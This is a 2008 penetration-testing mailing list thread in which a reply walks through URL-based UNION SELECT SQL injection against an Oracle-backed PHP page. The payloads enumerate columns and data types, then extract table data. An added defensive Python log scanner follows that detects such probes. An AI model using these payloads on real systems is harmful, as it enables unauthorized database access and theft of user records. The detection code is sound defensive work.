Penetration Testing mailing list archives
Re: Oracle URL SQL Injection issue
From: jeffrey rivero <jeffr76 () yahoo com>
Date: Fri, 18 Jan 2008 13:44:34 -0500
Hello all,

In your UNION, start by finding out how many columns there are, i.e.

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;--
would give you 3 columns

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;--
would give you 4

Then once you have that, get the data types:

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;--
for the first to be a string, and so on.

Then you can start to get real data from the tables, or

http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20col1name,col2name,1,'a'%20from%20usr;--

Jeff

Clone wrote:
> Hey List,
>
> I am pen testing a web app that supplies SQL parameters on the URL, something like
>
> http://x.y.z.a/item.php?Id=90
>
> I did blind SQL injection by adding AND 1=1 to confirm the vulnerability.
>
> Now when I do
>
> http://x.y.z.a/item.php?Id=90'
>
> I get
>
> ociparse() [function.ociparse]: OCIParse: ORA-01756: quoted string not properly terminated in item.php on line 312
>
> Then I tried (after confirming presence of usr table name)
>
> http://x.y.z.a/item.php?Id=90%20UNION%20SELECT%20*%20from%20usr;--
>
> and I get the error
>
> ociexecute() [function.ociexecute]: OCIStmtExecute: ORA-01789: query block has incorrect number of result columns in dbs.inc on line 44
>
> I know one valid user account in the Oracle DB.
>
> Any idea what's the best strategy to move forward? I'm not getting any further from here so far.
>
> Any advice / help would be much appreciated.
>
> Cheers

------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW? Cenzic finds more, "real" vulnerabilities fast. Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
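
A defender's view of the probes in this thread, as an added example that is not part of the original posts: a Python log check that flags non-numeric `Id` values and spots a client trying `UNION SELECT` with several different column counts. The log format, client addresses and function names are assumptions, and the sample lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines in an assumed format (not taken from the thread).
SAMPLE_LOG = """\
10.0.0.5 "GET /item.php?Id=90 HTTP/1.1" 200
10.0.0.9 "GET /item.php?Id=90' HTTP/1.1" 200
10.0.0.9 "GET /item.php?Id=90%20UNION%20SELECT%201,1,1%20from%20usr;-- HTTP/1.1" 200
10.0.0.9 "GET /item.php?Id=90%20UNION%20SELECT%201,2,3,4%20from%20usr;-- HTTP/1.1" 200
10.0.0.9 "GET /item.php?Id=90%20UNION%20SELECT%20'a',1,1,1%20from%20usr;-- HTTP/1.1" 200
""".splitlines()
LINE = re.compile(r'^(\S+) "(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION = re.compile(r"union\s+(?:all\s+)?select\s+(.*?)\s+from\b", re.I | re.S)

def classify(value):
    """Return None for a plain integer id, else a (label, column_count) tuple."""
    if re.fullmatch(r"\d+", value):
        return None
    m = UNION.search(value)
    if not m:
        return ("non-numeric", None)
    cols = m.group(1).strip()
    # Naive count: a comma inside a quoted literal would be miscounted.
    return ("union-select", None if cols == "*" else len(cols.split(",")))

def scan(lines, param="Id"):
    """Group suspicious values of `param` by client address."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        client, target = m.groups()
        for value in parse_qs(urlsplit(target).query).get(param, []):
            finding = classify(value)
            if finding:
                hits[client].append(finding)
    return dict(hits)

def enumerating_clients(hits):
    """Clients that sent UNION SELECT with two or more different column counts."""
    out = {}
    for client, findings in hits.items():
        counts = sorted({n for label, n in findings if label == "union-select" and n})
        if len(counts) >= 2:
            out[client] = counts
    return out
```

A numeric parameter that ever carries a non-integer value is already worth alerting on; the column-count sequence separates deliberate enumeration from a stray malformed link.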